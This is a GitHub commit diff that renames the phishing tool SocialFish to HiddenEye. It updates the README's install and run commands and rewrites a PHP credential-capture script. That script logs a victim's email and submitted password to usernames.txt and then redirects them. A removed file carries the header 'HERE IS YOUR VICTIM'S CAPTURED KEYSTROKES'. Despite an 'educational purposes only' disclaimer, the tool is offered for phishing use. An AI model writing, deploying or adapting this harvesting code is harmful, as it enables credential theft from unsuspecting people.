Merge branch 'dev' into master

This commit is contained in:
Artur Tretiak 2018-10-28 22:15:42 +02:00 committed by GitHub
commit 17d03bc153
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
10 changed files with 3845 additions and 2123 deletions

View File

@ -1,11 +1,9 @@
<p align="center"> <p align="center">
<img src="https://raw.githubusercontent.com/An0nUD4Y/SocialFish/master/social.png"> <img src="logo.png">
</p> </p>
<h1 align="center">SocialFish v3.0</h1>
<p align="center"> <p align="center">
AN ADVANCED PHISHING TOOL WITH MULTIPLE FUNCTIONALITY Modern phishing tool with advanced functionality
[ Automatic keylogger, Victim Device info , Many Pages ]
</p> </p>
<p align="center"> <p align="center">
@ -20,13 +18,7 @@
* Wget from Python * Wget from Python
* PHP * PHP
* sudo * sudo
## :octocat: DEVELOPERS
1. An0nUD4Y [ Instagram.com/its_udy ]
2. usama7628674
3. UNDEADSEC
4. Micrafast
5. alexmozzhakov
6. _______________________ (Waiting For Your Contribution)
### TESTED ON FOLLOWING ### TESTED ON FOLLOWING
* **Kali Linux - Rolling Edition** * **Kali Linux - Rolling Edition**
@ -45,15 +37,25 @@
* **Black Arch** * **Black Arch**
## :octocat: DEVELOPERS // CONTRIBUTORS
1. An0nUD4Y [ Instagram.com/its_udy ] - **Developer**
2. usama7628674 - **Developer**
3. UNDEADSEC - **Developer**
4. Micrafast - **Contributor**
5. alexmozzhakov - **Contributor**
6. sTiKyt - **Contributor**
7. _______________________ (Waiting For Your Contribution)
### CLONE ### CLONE
``` ```
git clone https://github.com/An0nUD4Y/SocialFish.git git clone https://github.com/DarkSecDevelopers/HiddenEye.git
``` ```
### RUNNING (In Linux) ### RUNNING (In Linux)
``` ```
cd SocialFish cd HiddenEye
``` ```
``` ```
@ -65,23 +67,23 @@ sudo pip3 install -r requirements.txt
``` ```
``` ```
chmod 777 SocialFish.py chmod 777 HiddenEye.py
``` ```
``` ```
python3 SocialFish.py python3 HiddenEye.py
``` ```
OR OR
``` ```
./SocialFish.py ./HiddenEye.py
``` ```
### RUNNING (If distro based on Arch Linux) ### RUNNING (If distro based on Arch Linux)
``` ```
cd SocialFish cd HiddenEye
``` ```
``` ```
@ -96,17 +98,17 @@ sudo pip3 install -r requirements.txt
``` ```
``` ```
chmod 777 SocialFish.py chmod 777 HiddenEye.py
``` ```
``` ```
python3 SocialFish.py python3 HiddenEye.py
``` ```
OR OR
``` ```
./SocialFish.py ./HiddenEye.py
``` ```
@ -131,23 +133,23 @@ pip3 install wget
``` ```
``` ```
git clone https://github.com/An0nUD4Y/SocialFish git clone https://github.com/DarkSecDevelopers/HiddenEye.git
``` ```
``` ```
cd SocialFish cd HiddenEye
``` ```
``` ```
chmod 777 SocialFish.py chmod 777 HiddenEye.py
``` ```
``` ```
python SocialFish.py python HiddenEye.py
or or
./SocialFish.py ./HiddenEye.py
``` ```
### Running (One Code installation in termux) ### Running (One Code installation in termux)
@ -163,7 +165,7 @@ After opening Copy and run this Single Command.
``` ```
``` ```
pkg install git python php curl openssh grep && pip3 install wget && git clone https://github.com/An0nUD4Y/SocialFish && cd SocialFish && chmod 777 SocialFish.py && python SocialFish.py pkg install git python php curl openssh grep && pip3 install wget && git clone https://github.com/DarkSecDevelopers/HiddenEye && cd HiddenEye && chmod 777 HiddenEye.py && python HiddenEye.py
``` ```
@ -272,7 +274,7 @@ pkg install git python php curl openssh grep && pip3 install wget && git clone h
TO BE USED FOR EDUCATIONAL PURPOSES ONLY TO BE USED FOR EDUCATIONAL PURPOSES ONLY
</p> </p>
The use of the SocialFish is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.
"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
@ -294,8 +296,5 @@ If you liked the work and want to support us all, you can donate :D
Bitcoin Address: qpuwdfv3p3gpufzctjapp0dp9z4kkk9x6cgl2hhghe Bitcoin Address: qpuwdfv3p3gpufzctjapp0dp9z4kkk9x6cgl2hhghe
### VIDEO DEMO
<p align="center">
<a href="https://www.youtube.com/watch?v=dCuZR2C7Hhw">
<img src="https://raw.githubusercontent.com/An0nUD4Y/SocialFish/master/video.png" />
</a></p>

View File

@ -1,6 +1 @@
_________________________________________________________________
_________________________________________________________________
HERE IS YOUR VICTIM'S CAPTURED KEYSTROKES
_______________________________________________________________
WORK BY :- ANONUD4Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -1,6 +1,22 @@
<?php <?php
include 'ip.php'; include 'ip.php';
session_start();
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['Email'] . " [PASS]: " . $_POST['Passwd'] . "\n", FILE_APPEND); $pass = $_POST["password"];
header('Location: <CUSTOM>'); $email=$_SESSION["Email"];
exit(); //opening logins text file for appending new data.
$file = fopen("usernames.txt", "a") or die("Unable to open file!");
//Writing email and password to logins.txt.
fwrite($file, "[EMAIL: ]" . " ". $email . " " . " " . "[PASS: ]" . " " . $pass .FILE_APPEND);
fclose($file);//closing logins.txt.
//redirecting user to the google drive's locations where the game is available to download.
//change the location url to redirect to a website of your choice.
header('Location: <CUSTOM>');
exit();
session_destroy();
?>

View File

@ -1 +1 @@
theme: jekyll-theme-architect theme: jekyll-theme-merlot

BIN
logo.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 30 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 1.8 KiB

BIN
video.png

Binary file not shown.

Before

Width:  |  Height:  |  Size: 311 KiB